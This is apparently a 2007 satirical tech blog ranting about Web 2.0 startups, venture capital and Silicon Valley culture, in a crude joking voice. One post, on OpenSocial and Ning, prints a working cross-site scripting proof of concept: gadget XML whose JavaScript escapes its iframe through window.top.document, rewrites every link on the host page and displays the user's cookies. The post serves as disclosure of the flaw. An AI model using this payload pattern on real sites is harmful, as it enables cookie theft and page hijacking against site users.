Shattering Inanity

Posted by harold at December 19th, 2007

Since I’m on vacation (and I hope you are, too! Happy Holidays!), I decided to write a “normal” blog post. Here goes:

Cocaine flavored doughnuts seem to be quite popular in Palo Alto these days. Why? I don’t know. It might just be because we’ve unwittingly become the favorite retirement location of ’80s traders, who, after years of heart attacks, now want to slow down a bit and serve as venture capitalists. And by serve, I mean continue to ravage the markets for personal gain, all the while screwing up most of the time anyway. For those of you out in the real world, this should explain a lot. Alan Greenspan’s quite famous irrational exuberance wasn’t due to any sort of failure of the market after all. It’s actually about crackheads controlling the purse strings in this county.

And when crackheads prevail, sexist walnuts can’t be far behind. That, also, should make perfect sense, considering that silicon valley has an approximate 7:1 male to female ratio (not including stray canines, who seem to have no problem whatsoever replicating furiously). When you combine the California sun and surf with computer nerds and throngs of wannabes, the unfortunate consequences are far worse than those of liposuction. Put simply, the creative tech culture is imploding in on itself in a fury of 170-hour work weeks, only to be replaced by a bunch of sterile websites. Like that one social networking site for lobsters. Killer idea, guys!

Woe is the engineer who just wants to live the simple life today. What with traffic, rent and food prices through the roof, an overabundance of crackheads, and a distinct lack of culture, all that’s left to do is work. And that’s very sad because hacking around in one’s freetime is really where all the innovation starts. Maybe a little LSD if you’re from the east bay, but just as likely it’s about getting electrocuted one too many times and suddenly coming up with an idea for genetically engineered peanut butter. Or something. You probably didn’t notice, but I’m a little off my rocker today. Those recalcitrant hedgehogs are really gnawing at me.

But the point is, money does not compensate for living like a robot in a trash can. Take that advice wisely, youngfolk, as you go to work for the latest dot-bomb startup (version 2.0). You’re only young once, so you might as well take a shower now and then and maybe plant some geraniums in your yard before you get arthritis. That is, if you even have a yard. Trust me, gardening is far better than cocaine. If you’re really clever, you can even combine the two. But having friends helps. Walnuts, not so much. It’s all a matter of perspective. I prefer pine nuts, myself. They’re far more progressive.

So maybe California isn’t the best place in the universe. Me, I’ve found my own little home away from home volunteering in Sudan. But South Carolina is just as good—be careful not to exploit any migrant workers. They’re people too, you know. And unlike the ones in northern California, they don’t even get stock options. Just slow down and stomp on the daises. Fucking daises, I hate ‘em. Maybe something will happen. Maybe you’ll get a life. It’s important to do whatever, you know. Crawl around, find the life that suits you, and hope to hell that it doesn’t all go down the toilet one fine morning in February. Certainly beats getting fat on doughnuts, I guess.

Posted by harold at November 22nd, 2007

Okay so actually, Phil (my neighborhood crack dealer) mentioned that there are still a couple of tech companies out there. And I mean organizations that actually are results-oriented rather than wasting-peoples’-time-on-stupid-stuff oriented. Yes, I know it’s hard to believe. One of better performing (well, before this week’s stock disaster) firms is VMware. As anyone with half a brain knows, VMware is a software company with a focus on delivering virtualization solutions on x86 architecture PCs. Based off research done in Mendel Rosenblum’s research group at Stanford back in the late 90’s, VMware completely changed the face of machine virtualization by offering blazing fast speeds on quirky commodity hardware (interested in the details? Read this paper). But it’s not all fun and games and fairies and daises and lightly salted french fries. The x86 architecture with all its quirks is not naturally virtualizable under Popek’s and Goldberg’s canonical definition. To be naturally virtualizable, all privileged or sensitive instructions must generate a trap. On x86, there are at least 17 instructions in the base instruction set which violate this key property. As a result, trying to correctly virtualize the x86 is equivalent to attempting to drive a Yugo through Death Valley. Oh sure you can do it, but you’ll probably break down after about 10 feet. 11 and a half if you’re lucky. VMware claims their virtual machine is totally isolated, but hey, we all know it’s only a matter of time before someone breaks the isolation. Now I know legend has it that they convinced the NSA to use VMware… but I also happen to know that my old buddies at the NSA loved to claim they internally used products which in reality they knew exactly how to crack. Hehe.

Oh yeah so anyway, another one of these technology-oriented companies based in the Valley is Coverity. You might need three quarters of a brain to have heard of them, since they’re developer-oriented (half a brain and a quarter pounder with swiss would probably work too). This company produces tools which perform source code analysis in order to improve the software development process. Sounds like a pretty big deal to me… as we all know, bugs in software love to cause problems. However, your average VC didn’t see it that way. For example, rather than providing capital to Coverity, Sequoia decided to pour money into stupid little abominations like TokBox, which is a startup that combines the power of rounded corners and the built-in video and webcam support in Flash. Rather than thinking, Sequoia decided to throw good money at an inconsequential little trinket, and now they’re paying for it (I’ve heard the TokBox team is, ahem, “brilliant”). Coverity, on the other hand, has managed to grow to a respectable level of profitability based on, no not ads, certainly not VC funding… wait for it… innovations that deliver true value to customers. Hint to VCs: next time you see a company that’s developed innovative tools for finding ever more of those nasty bugs lurking in our code bases–give THEM the money! Not the guy who invented arsenic-flavored chalk candybars.

Well folks, we’ve gone through the bad, we’ve glimpsed at the good that remains. Now it’s up to all of us to decide whether the tech industry goes in the gutter or goes for the gold. It’s a simple decision, surely. But executing on it executing on it just seems to be a little too difficult given the apparent rampancy of zombies in the Valley today.

Posted by harold at November 14th, 2007

Facebook. Digg. Google. Three companies I’ve heard way too much about this past week. Oddly enough, those names all have at least three things in common (good things come in threes… yeah right): they’re headquartered in the San Francisco Bay Area, they depend on the social factor (read: the online equivalent of STDs), and finally, they’re all wrapped up in the whole advertising thing. Not to mention, out of the three companies I mentioned, only Google ever even had any technology worth mentioning to back up their infamy. Of course Google too is now practically cruising on search and spending ridiculous wads of cash on promoting other projects (read: AdSense). This whole Web 2.0 mindset of “we need more ads to get more money” has quite tragically far surpassed all true innovation in the Valley.

Google is not the worst offender in this market. Earlier this week in New York City, Facebook announced its Social Ads program, which is apparently a behavioral-targeting system for advertisers. Every time some worthless syphilis-infected Facebook user decides to buy some useless trinket, a notification of that purchase will be broadcast across their Facebook buddies’ news feeds. Sounds great doesn’t it? As if Facebook weren’t already privacy invasion central. Of course all the company executives invited to the launch event loved the idea. Even my local crack dealer down on the corner told me this “will give Google a run for its money.” And speaking of coke, now you can even add products like Coca-Cola as your dearest dearest friend. Thanks Facebook! I don’t know about you, but when was the last time you considered your can of Coke “social?” I mean heroin or something, sure. But soda pop?

All those ads-that-pay-for-everything are pretty stupid. So’s all the attention surrounding these halfwit Web 2.0 startups. Recently, everybody was circulating rumors about how Digg was considered to be an acquisition target by Yahoo. Who gives a damn? Digg is just another web startup with a pretty large user base submitting stories. Heck, if you added up the IQs of all of its users, it may even be a little above 10 by now. Hallelujah! What’s the difference between Digg and a waterlogged phonebook? Not a whole lot. I’d much rather be pruning my exquisite collection of Bonsai Trees. With fingernail clippers, no less.

But this all brings up some bigger questions: what’s wrong with this picture? What has happened to technology? Half a century after the rise of Silicon Valley as a breeding ground for innovative technology-oriented companies, have we hit a pothole the size of Jupiter? Is this the best Silicon Valley can come up with? Top tier companies fighting over advertising surface area for Joe-Bob’s snail training guide and “Enlarge Your Leprechaun in 35 Days!”? Whatever happened to the legendary competition between AMD and Intel, E. coli and Jack in the Box, heck evem Netscape and Microsoft’s (incredibly lame) Internet Explorer? Quite plainly, the Valley has been flooded with yet-another-poorly-designed-web-2.0-social website (and clones thereof). Where have all the techboys gone?

To be continued…

Posted by harold at November 3rd, 2007

Friends. Romans. People with half a brain. It’s finally happened: Google’s opened the floodgates to ubiquitous bad taste, annoyances, and exploits across all social networking platforms, ranging from Ning to MySpace to the Iranian Goat Farmers’ Association. If you’ve been following the tech news lately, you’re probably aware that Google and his merry band of transvestites released the abomination known as the OpenSocial API this past Thursday. I understand that sounds like a pretty rash statement—I do get a rash some times—but this time I’m going to back it up with the facts and let you decide, doc.

It all started with a neat little trinket known as Google Gadgets. If you’re the sort of person who doesn’t give a damn about personal privacy, I’m sure you’ve used iGoogle, which allows you to put all kinds of nice little gadgets on your Google home page. Ok, even I use it—it’s just way too handy being able to check the weather and gas prices without even stepping outside! But you know, then I got hacking, and things didn’t look so hot anymore… any gadget that you add can run arbitrary javascript in your browser, and if you create a gadget using the “html-inline” content mode, it can even radically alter the structure of the iGoogle home page! So I tried that, and boy was I relieved when it gave me an extra little warning that I brashly clicked through to get my widget onto my home page… but hey, whatever I put on my iGoogle is my fault. It’s my customization.

On the other hand, social networks—at least amongst the non-retard/myspace set—very wisely have thus far constrained the format of peoples’ profiles. You get maybe a picture, some work history, and some stupid little details about how the person’s a big loser that nobody cares about. Maybe some trite comments from so-called “friends.” But with OpenSocial…? Perhaps you should take a look at my niece’s handiwork. Sorry, she’s not that stupid, I actually made that page myself (got you back, Berli!). Anyway, you see that little box o’ seizures titled “preaty culrz!”? It’s a Google Gadget in full glory.

But it gets worse than that, friends. That little Google Gadget could actually be a lot nastier than it looks, because it’s an “html-inline” component… when I add it on iGoogle, it makes my whole page background nauseatingly flashy. Ning is actually shielding your eyes by ignoring the fact that it’s an “html-inline” component—and forcing the box o’ seizures to be rendered in an iframe. But wait a minute. Where’s that iframe being loaded from?? Let’s take a gander at the source to Berlinetta’s page:

<iframe id="embeddingFrame" ...
src="/gadgets/index/gadgetWrapper?url=http%3A%2F%2Fhosting.gmodules.com%2Fig%2Fgadgets%2Ffile%2F107691354973556300155%2Fsplendid.xml&ownerName=18wefqtay110x&mode=profile">
</iframe>

Splendid! If you view the source of gadgetWrapper with the url argument, you’ll notice that the code of the Gadget is inserted into the gadgetWrapper page on the server side. Those Web 2.0 wizards just left the front gates unlocked and well-oiled, ready to be swung right open. Now what if, purely hypothetically, one of Berlinetta’s puckish little friends happened to oh, push the gate open and walk in? But we don’t have to wonder, we can know.

Yes dudes, that’s right: that innocent looking little gadget purportedly describing a delicious extract of mulberry actually extracts your delicious cookies and rewrites all of the hyperlinks on the page. I could have been more devious about it, but remember, my goal here is merely exposition of how much Web 2.0 sucks. In case you missed it, here’s the link to the page with the exploit, and here’s the exploitive little gadget itself:

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="Splendid!" />
<Content type="html"><![CDATA[
<script language="javascript">

function exploit() {
  var doc = window.top.document;
  var a = doc.getElementsByTagName('a');
  for (var i = 0; i < a.length; i++) {
    if (a[i].hasAttribute('href')) {
      a[i].setAttribute('href',
        'http://www.haroldtherebel.com/2007/11/03/peer-prescience/');
    }
  }
  document.getElementById('done').innerHTML
  = document.cookie;
}

</script>
<font color="#ffffff"><form>
<center>Click this button to make all of the links
        on this page go to haroldtherebel.com:<br/>
<input type="button" onclick="exploit();"
       value="Exploit now!"><br/>
cook-ease:<br/>
<textarea id="done" rows="10" cols="60"></textarea></center>
</form></font>
]]></Content>
</Module>

The exploit really stands for itself, but let me point out the magic line: “var doc = window.top.document;” This says “yeah, I know I’m a measly little iframe, but just forget that and give me access to the whole document.” If the iframe comes from the same server as the main page, your browser is more than happy to honor that request. Hence the gate swings open. The floodgates of antisocial behavior, opened courtesy of OpenSocial. Good job Ning, Google, and everybody else! Rah-rah Web 2.0! Cross-site scripting makes you strong and healthy like a beluga whale!

Yeah, I’m sure that stuff is worth billions. Sorry, I’d put my money on a factory full of slave laborors making tennis shoes in south-east Asia anyday.

Posted by harold at October 27th, 2007

Hi. My name is Harold. I live in Sudan. Or maybe not. It doesn’t really matter all that much. What does matter is that far too many stupid companies with stupid ideas are getting far too much funding today from stupid people with access to altogether far too much money. Again. And again. And that, dear readers, is where I come in: to stop the insanity. To shatter the inanity.

I’ll admit, I’m no outsider to venture capital deals—or the valley itself, for that matter (um, the Nile river valley, of course…). But the pharaohs of my day somehow seemed wiser. Ok, maybe “wise” isn’t the best way to describe a VC. Nonetheless, today there abounds a very special breed of stupidity that just wasn’t around twenty years ago. Let’s be blunt about: it’s called Web 2.0, and it’s written that way because in the end, it’s a big fat zero.

My big concern is that all this “Web 2.0″ nonsense is merely a shell game. Sure, the pea is in there alright, but it’s a lot smaller and more shriveled up than all the effort being poured in to pursue it would suggest. I would definitely be the first to admit that it can be amusing at times to stuff a pea up your nose—well worth the trip to the emergency room—but that little pea is still lacking in the critical vitamins and nutrients that you might get buy shoving, say, a whole steak up your nose.

The same is true in technology. For example, consider that wonderful little gem known as justin.tv. If you have any vestiges of intelligence, you’ve never heard of it, so I’ll tell you what it is: it’s a site where people who have no life broadcast their lives over the internet, so people with even less of a life can live vicariously through them. Kind of entertaining maybe for 5 seconds, until the site starts making noise while I’m sitting in the library. But honestly folks, it’s a waste of effort. And a waste of Y Combinator’s funding… not to mention, a disgrace to the theory of fixed points!

We could go on, but let’s not waste any more time today. It’s going to take some careful analysis and tenacious exposition to route this Web 2.0 scourge. They don’t call me a rebel for nothing. After all, my truck does have a confederate flag bumper sticker left over from the previous owners. But hey, at least it’s not pastel with rounded corners.